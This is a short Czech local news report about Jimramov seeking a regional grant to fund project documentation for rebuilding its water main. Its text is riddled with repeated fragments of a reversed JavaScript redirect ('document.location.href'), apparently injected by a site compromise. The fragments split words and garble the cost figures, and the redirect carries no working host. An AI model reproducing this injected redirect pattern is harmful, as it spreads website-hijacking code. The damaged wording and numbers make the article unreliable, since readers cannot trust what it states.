Rainbow page separator

Dotace má podpořit rekonstrukci a rozšíření vodovodu

Čtvrtek, 17. března 2016

Jimramov / Žádost o dotaci z gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového programu s názvem Čistá voda 2016 z Fondu Vysočiny se rozhodli podat jimramovští zastupitelé. Dotační příspěvek by měl posloužit na pořízení projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace pro územní řízení, stavební povolení a výběr zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele pro rekonstrukci a rozšíření jimramovského vodovodu.
Celkové náklady projektu jsou vyčísleny na 250 tisíc korun bez daně z přidané hodnoty, přičemž městys Jimramov může uplatnit odpočet DPH.
Jimramovští chtějí na opravu a rozšíření obecního vodovodu žádat o dotační příspěvek ve výši šedesáti procent ceny projektu bez daně, což je s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to padesát tisíc korun. Podíl městyse by měl činit s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun.